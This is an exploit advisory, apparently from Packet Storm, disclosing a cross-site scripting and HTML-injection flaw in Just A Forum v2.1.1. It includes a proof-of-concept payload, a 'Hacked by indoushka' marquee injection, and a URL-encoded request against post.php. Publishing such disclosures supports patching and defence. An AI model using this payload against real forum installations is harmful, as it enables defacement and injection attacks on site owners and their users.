Just A Forum version 2.1.1 suffers from a cross site scripting vulnerability.
f942628108d16b6d63256b6d0445ec551ce6bb7db1df80e6b5741033053809cd| # Title : Just aForum v2.1.1 XSS Vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on: windows 8.1 Français V.(Pro)
| # Download : https://www.dl.persianscript.ir/script/Just_a_Forum_v2.1.1(PersianScript.ir).rar
=======================================
Poc :
Put in the search box xss payload ( XSS / HTML Inject :
<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>
https://127.0.0.1//forum/post.php?type=question%22%20%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E%22
Greetz :
jericho https://attrition.org & https://www.osvdb.org/ * packetstormsecurity.com * https://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed